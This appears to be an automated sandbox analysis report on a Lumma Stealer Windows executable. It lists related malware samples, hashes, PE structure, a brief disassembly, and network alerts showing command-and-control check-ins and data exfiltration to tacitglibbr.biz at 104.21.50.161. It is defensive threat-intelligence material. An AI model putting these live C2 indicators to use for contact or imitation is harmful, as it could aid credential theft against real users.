                                                                                                                tacitglibbr.bizfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                • 172.67.164.37
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 172.67.164.37
                                                                                                                wf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                NYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 104.21.50.161
                                                                                                                qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                • 172.67.164.37
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 104.21.50.161
                                                                                                                UUH30xVTpr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                • 172.67.164.37
                                                                                                                4TPPuMwzSA.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 104.21.50.161
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUSTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.67.152
                                                                                                                https://forms.gle/WXkgv9t1iFkxFXZb7Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 104.17.25.14
                                                                                                                RkB7FehGh6.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.2.110
                                                                                                                MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1Get hashmaliciousUnknownBrowse
                                                                                                                • 172.67.181.93
                                                                                                                c5bnEkMx.ps1Get hashmaliciousLummaCBrowse
                                                                                                                • 104.21.64.1
                                                                                                                Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.83.229
                                                                                                                sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                                • 188.114.97.6
                                                                                                                ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                • 188.114.97.6
                                                                                                                payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                                • 104.21.87.65
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                a0e9f5d64349fb13191bc781f81f42e1RkB7FehGh6.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                c5bnEkMx.ps1Get hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                • 104.21.50.161
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                • 104.21.50.161
                                                                                                                No context
                                                                                                                No created / dropped files found
                                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.804689296683032
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:X2hna87N3Y.exe
                                                                                                                File size:800'256 bytes
                                                                                                                MD5:443f4cf9f362a96bbd0845ba6d2859f0
                                                                                                                SHA1:1bf75dea31eaf0c26da3428ae2b8518771989522
                                                                                                                SHA256:e11c9223741b2d1291f1031539da3dd183ce2ac4b2de705d92366c6f61d94aa5
                                                                                                                SHA512:f43bf238027dacc972e98caff32461c680aefe1197be827348bb8bd371f85456352fbebf5bffa2381f6496466da2acef549c01c4e06c8d52727539196755db9a
                                                                                                                SSDEEP:24576:ErtEhokkSG46ZY4vaIAaCzxZY4vaIAaCzs:ErGhokkSG4kdCzvdCzs
                                                                                                                TLSH:FC05010170C0C072D86725BA64F6AF75AE3EF4300F766ADB9B980F799B211C19635B1A
                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....^g.........."......f........................@.......................................@.....................................P..
                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                Entrypoint:0x40c312
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows cui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x675EBBFA [Sun Dec 15 11:22:34 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:49250672a2ab6e8bdde5f4e329392300
                                                                                                                Instruction
                                                                                                                call 00007F5D60BBA05Ah
                                                                                                                jmp 00007F5D60BB9EC9h
                                                                                                                mov ecx, dword ptr [00432840h]
                                                                                                                push esi
                                                                                                                push edi
                                                                                                                mov edi, BB40E64Eh
                                                                                                                mov esi, FFFF0000h
                                                                                                                cmp ecx, edi
                                                                                                                je 00007F5D60BBA056h
                                                                                                                test esi, ecx
                                                                                                                jne 00007F5D60BBA078h
                                                                                                                call 00007F5D60BBA081h
                                                                                                                mov ecx, eax
                                                                                                                cmp ecx, edi
                                                                                                                jne 00007F5D60BBA059h
                                                                                                                mov ecx, BB40E64Fh
                                                                                                                jmp 00007F5D60BBA060h
                                                                                                                test esi, ecx
                                                                                                                jne 00007F5D60BBA05Ch
                                                                                                                or eax, 00004711h
                                                                                                                shl eax, 10h
                                                                                                                or ecx, eax
                                                                                                                mov dword ptr [00432840h], ecx
                                                                                                                not ecx
                                                                                                                pop edi
                                                                                                                mov dword ptr [00432880h], ecx
                                                                                                                pop esi
                                                                                                                ret
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                sub esp, 14h
                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                xorps xmm0, xmm0
                                                                                                                push eax
                                                                                                                movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                call dword ptr [00430920h]
                                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                                xor eax, dword ptr [ebp-0Ch]
                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                call dword ptr [004308D4h]
                                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                                call dword ptr [004308D0h]
                                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                                lea eax, dword ptr [ebp-14h]
                                                                                                                push eax
                                                                                                                call dword ptr [00430968h]
                                                                                                                mov eax, dword ptr [ebp-10h]
                                                                                                                lea ecx, dword ptr [ebp-04h]
                                                                                                                xor eax, dword ptr [ebp-14h]
                                                                                                                xor eax, dword ptr [ebp-04h]
                                                                                                                xor eax, ecx
                                                                                                                leave
                                                                                                                ret
                                                                                                                mov eax, 00004000h
                                                                                                                ret
                                                                                                                push 00433D60h
                                                                                                                call dword ptr [00430940h]
                                                                                                                ret
                                                                                                                push 00030000h
                                                                                                                push 00010000h
                                                                                                                push 00000000h
                                                                                                                call 00007F5D60BC0D92h
                                                                                                                add esp, 0Ch
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x306940x50.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000xe8.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x380000x1c78.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x2cb780x18.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x28ff80xc0.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x308600x17c.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x2646d0x266001cb7d0c9464ff9128ba37efaba3a0910False0.5475111970684039data6.556524326867543IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x280000x9bec0x9c00878d385b80bbd700cbb2c5199eea38b8False0.43246694711538464data4.997055879664181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x320000x252c0x1600a99215662023900c738cb0230ba36a9aFalse0.40873579545454547data4.766185881298672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .CODE0x350000xef40x1000540c3f0f86009f36fac5556f91f62d2aFalse0.498291015625data5.7055594939540075IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .tls0x360000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x370000xe80x200a6b9bc0f9a7419955ff68c6924c37c42False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x380000x1c780x1e00d59be9c629a3697e2f595ead5e7c7371False0.7571614583333334data6.452492512245182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                .bss0x3a0000x472000x47200ed9994771f012739118aa84a4b9096a1False1.000329525483304data7.999382444394363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .bss0x820000x472000x47200ed9994771f012739118aa84a4b9096a1False1.000329525483304data7.999382444394363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_MANIFEST0x370600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                                                DLLImport
                                                                                                                ADVAPI32.dllCryptContextAddRef
                                                                                                                KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                USER32.dllDefWindowProcW, GetMessageW, RegisterClassW
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-17T09:44:44.702846+01002058230ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)1192.168.2.4543261.1.1.153UDP
                                                                                                                2024-12-17T09:44:46.252787+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449730104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:46.252787+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:47.246583+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:47.246583+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:48.513726+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449731104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:48.513726+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:49.565445+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:49.565445+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:51.088601+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449732104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:51.088601+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:52.295457+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:53.644621+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449733104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:53.644621+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:55.870029+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449734104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:55.870029+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:58.597611+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449735104.21.50.161443TCP
                                                                                                                2024-12-17T09:44:58.597611+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.50.161443TCP
                                                                                                                2024-12-17T09:45:03.023443+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449740104.21.50.161443TCP
                                                                                                                2024-12-17T09:45:03.023443+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.50.161443TCP
                                                                                                                2024-12-17T09:45:06.714844+01002058231ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)1192.168.2.449743104.21.50.161443TCP
                                                                                                                2024-12-17T09:45:06.714844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.50.161443TCP
                                                                                                                2024-12-17T09:45:07.452999+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743104.21.50.161443TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 17, 2024 09:44:45.023700953 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:45.023750067 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:45.023848057 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:45.027175903 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:45.027190924 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:46.252665997 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:46.252787113 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:46.256473064 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:46.256506920 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:46.256831884 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:46.305723906 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:46.305723906 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:46.305922985 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:47.246604919 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:47.246701956 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:47.246778965 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:47.248999119 CET49730443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:47.249027014 CET44349730104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:47.301083088 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:47.301139116 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:47.301203966 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:47.301515102 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:47.301525116 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:48.513598919 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:48.513725996 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:48.515461922 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:48.515477896 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:48.515727997 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:48.517081022 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:48.517101049 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:48.517159939 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.565459013 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.565510988 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.565541983 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.565563917 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.565576077 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.565586090 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.565632105 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.565640926 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.565658092 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.565675020 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.581465960 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.581531048 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.581549883 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.581573963 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.581619978 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.591245890 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.640079975 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.685339928 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.733839989 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.757028103 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.760801077 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.760972977 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.760991096 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.761018038 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.761200905 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.761234999 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.761259079 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.761400938 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.761413097 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.761425018 CET49731443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.761430979 CET44349731104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.872530937 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.872586012 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:49.872689009 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.873043060 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:49.873060942 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:51.088483095 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:51.088601112 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:51.090038061 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:51.090045929 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:51.090280056 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:51.091600895 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:51.091774940 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:51.091801882 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:51.091866970 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:51.091871977 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:52.295471907 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:52.295583963 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:52.295639038 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:52.295906067 CET49732443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:52.295923948 CET44349732104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:52.424551010 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:52.424597979 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:52.424686909 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:52.425050974 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:52.425067902 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:53.644543886 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:53.644620895 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:53.646584988 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:53.646599054 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:53.647037029 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:53.648575068 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:53.648880005 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:53.648921967 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:54.406203032 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:54.406316996 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:54.406410933 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:54.408658981 CET49733443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:54.408682108 CET44349733104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:54.654217958 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:54.654278040 CET44349734104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:54.654355049 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:54.654714108 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:54.654733896 CET44349734104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:55.869947910 CET44349734104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:55.870028973 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:55.871493101 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:55.871500969 CET44349734104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:55.871748924 CET44349734104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:55.873018026 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:55.873198032 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:55.873233080 CET44349734104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:55.873291969 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:55.873301029 CET44349734104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:56.757422924 CET44349734104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:56.757527113 CET44349734104.21.50.161192.168.2.4
